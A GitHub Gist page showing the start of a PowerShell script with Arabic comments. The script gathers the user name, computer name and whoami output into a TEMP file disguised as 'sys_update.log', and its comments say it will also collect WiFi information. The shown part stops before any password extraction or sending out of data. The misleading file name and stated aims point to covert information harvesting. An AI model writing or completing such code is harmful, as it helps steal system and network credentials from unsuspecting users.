Skip to content

Instantly share code, notes, and snippets.

View avraim23's full-sized avatar
🏠
Working from home

Avraim Fahmy avraim23

🏠
Working from home
View GitHub Profile
# 1. تجهيز ملف اللوج (System Info + WiFi)
$f = "$env:TEMP\sys_update.log"
# جمع معلومات النظام
"User: $env:USERNAME" | Out-File $f -Encoding UTF8
"PC Name: $env:COMPUTERNAME" | Out-File $f -Append -Encoding UTF8
# === الإضافة الجديدة: User and Network Info ===
"`n--- User & Network Info ---" | Out-File $f -Append -Encoding UTF8
whoami | Out-File $f -Append -Encoding UTF8